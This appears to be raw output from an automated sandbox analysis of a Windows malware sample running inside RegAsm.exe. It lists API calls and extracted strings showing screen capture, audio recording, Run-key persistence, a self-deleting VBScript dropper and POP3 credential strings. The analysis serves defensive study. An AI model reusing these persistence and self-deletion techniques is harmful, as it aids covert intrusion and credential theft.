                                                                                                                            • Opcode Fuzzy Hash: 912b91bcee59c5ac73c124bb0811566e2b40e5b970351445414cbd9e4b54fd2a
                                                                                                                            • Instruction Fuzzy Hash: E1614531602709E6EF349A2B48917BF2395AB1D304F58341BED42DB3C1D55DED428A1E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c6b1042308d2b4dc2ea763a701fecb4f21cb89e1eeb5fcb47da04713de909616
                                                                                                                            • Instruction ID: c8a25274eb6ace22fd939f207aba0bb726f52b15d0dfb3f1b2e2615f3a586ecc
                                                                                                                            • Opcode Fuzzy Hash: c6b1042308d2b4dc2ea763a701fecb4f21cb89e1eeb5fcb47da04713de909616
                                                                                                                            • Instruction Fuzzy Hash: B2619C71602609A6DA34496B8893BBF6394EB6D308F94341BE443DB3C1E61DEC43875E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                            • Instruction ID: b97fed3bff06dc01e1c808345b9e1576e5435f58d5e0cb17a963d6e43aa39459
                                                                                                                            • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                            • Instruction Fuzzy Hash: C8516A21E01A4496DB38892964D67BF67A99B1E304F18390FE443CB7C2C64DED06C35E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 628fd2d23e3b9e8eddda9414cca102861cb20c2ab21f2c1c82199380d97b1b87
                                                                                                                            • Instruction ID: 96b5c22f40dc969dc1399d427f9382315b517a9523814fa291cced01a0c32d8b
                                                                                                                            • Opcode Fuzzy Hash: 628fd2d23e3b9e8eddda9414cca102861cb20c2ab21f2c1c82199380d97b1b87
                                                                                                                            • Instruction Fuzzy Hash: 5B617E72A083059FC304DF35D581A5FB7E5AFCC318F510E2EF499D6151EA35EA088B86
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                            • Instruction ID: 78f0f7b5b7642c22d8ee35c169576c4e0068381375f86828a5140fd971b96714
                                                                                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                            • Instruction Fuzzy Hash: 9311E6BB24034143D6088A2DCCB85B7E797EADD321F7D626FF0424B758DB2AA9459608
                                                                                                                            APIs
                                                                                                                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                                                                                                              • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418F2A
                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418F2D
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00418F30
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418F62
                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                                                                                                            • GetCursorInfo.USER32(?), ref: 00418FA7
                                                                                                                            • GetIconInfo.USER32 ref: 00418FBD
                                                                                                                            • DeleteObject.GDI32(?), ref: 00418FEC
                                                                                                                            • DeleteObject.GDI32(?), ref: 00418FF9
                                                                                                                            • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                                                                                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                                                                                                            • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                                                                                                            • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                                                                                                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                                                                                                            • DeleteDC.GDI32(?), ref: 0041917C
                                                                                                                            • DeleteDC.GDI32(00000000), ref: 0041917F
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00419182
                                                                                                                            • GlobalFree.KERNEL32(?), ref: 0041918D
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00419241
                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00419248
                                                                                                                            • DeleteDC.GDI32(?), ref: 00419258
                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00419263
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                                                                            • String ID: DISPLAY
                                                                                                                            • API String ID: 4256916514-865373369
                                                                                                                            • Opcode ID: a4efc0814f5d007b3b148c6bcc619dfe08be1e7f5941a9ceea94ee302c4ba2ca
                                                                                                                            • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                                                                                                            • Opcode Fuzzy Hash: a4efc0814f5d007b3b148c6bcc619dfe08be1e7f5941a9ceea94ee302c4ba2ca
                                                                                                                            • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                                                                              • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                                                                                                              • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                                                                                              • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                                                                                                              • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                                                                                              • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                                                                                                            • ExitProcess.KERNEL32 ref: 0040D7D0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                            • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                            • API String ID: 1861856835-332907002
                                                                                                                            • Opcode ID: d6bdc6585a4e4fb30af1d5b39ccbf0b4685936c32e7406392716d295adf9b9e3
                                                                                                                            • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                                                                                                            • Opcode Fuzzy Hash: d6bdc6585a4e4fb30af1d5b39ccbf0b4685936c32e7406392716d295adf9b9e3
                                                                                                                            • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                                                                              • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                                                                                                              • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                                                                                              • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                                                                                                              • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                                                                                              • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63691986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                                                                                                            • ExitProcess.KERNEL32 ref: 0040D419
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                            • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                            • API String ID: 3797177996-2557013105
                                                                                                                            • Opcode ID: 05e3ec18fa8463a6322569f1bb3c1d7af6336844a107ad2f8429c4fb3964e9d7
                                                                                                                            • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                                                                                                            • Opcode Fuzzy Hash: 05e3ec18fa8463a6322569f1bb3c1d7af6336844a107ad2f8429c4fb3964e9d7
                                                                                                                            • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                                                                                                            APIs
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                                                                                                            • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00412541
                                                                                                                            • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                                                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                                                                                                            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                                                                                                            • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                                                                                                              • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 00412682
                                                                                                                            • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                                                            • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                                                                                            • API String ID: 2649220323-436679193
                                                                                                                            • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                                                                                                            • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                                                                                                            • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                                                                                                            • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                                                                                                            APIs
                                                                                                                            • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                                                                                                            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 0041B18E
                                                                                                                            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                                                                                                            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                                                                                                            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                                                                                                            • SetEvent.KERNEL32 ref: 0041B219
                                                                                                                            • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                                                                                                            • CloseHandle.KERNEL32 ref: 0041B23A
                                                                                                                            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                                                                                                            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                                                            • API String ID: 738084811-2094122233
                                                                                                                            • Opcode ID: c2dffa3932ea448a70c857dca7e5090a6bd86c42919e5ddd10193c91cbe91aa0
                                                                                                                            • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                                                                                                            • Opcode Fuzzy Hash: c2dffa3932ea448a70c857dca7e5090a6bd86c42919e5ddd10193c91cbe91aa0
                                                                                                                            • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                                            • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                                                                            • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                                                                            • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                                                                            • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                                                                            • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                                                                            • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                                                                            • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                                                                            • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Write$Create
                                                                                                                            • String ID: RIFF$WAVE$data$fmt
                                                                                                                            • API String ID: 1602526932-4212202414
                                                                                                                            • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                                                                                            • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                                                                                                            • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                                                                                            • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                            • API String ID: 1646373207-255920310
                                                                                                                            • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                                                                                            • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                                                                                                            • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                                                                                            • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _strlen
                                                                                                                            • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                            • API String ID: 4218353326-3023110444
                                                                                                                            • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                            • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                            • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                            • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                            APIs
                                                                                                                            • _wcslen.LIBCMT ref: 0040CE07
                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                                                                                                            • CopyFileW.KERNEL32 ref: 0040CED0
                                                                                                                            • _wcslen.LIBCMT ref: 0040CEE6
                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                                                                                                            • CopyFileW.KERNEL32 ref: 0040CF84
                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                                                                                                            • _wcslen.LIBCMT ref: 0040CFC6
                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                                                                                                            • CloseHandle.KERNEL32 ref: 0040D02D
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                                                                                                            • ExitProcess.KERNEL32 ref: 0040D062
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                            • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                                                                                            • API String ID: 1579085052-2309681474
                                                                                                                            • Opcode ID: 37bf41b36f569e96123a73dee1261e03dac0feab31b5a087a033d73400f0ce52
                                                                                                                            • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                                                                                                            • Opcode Fuzzy Hash: 37bf41b36f569e96123a73dee1261e03dac0feab31b5a087a033d73400f0ce52
                                                                                                                            • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
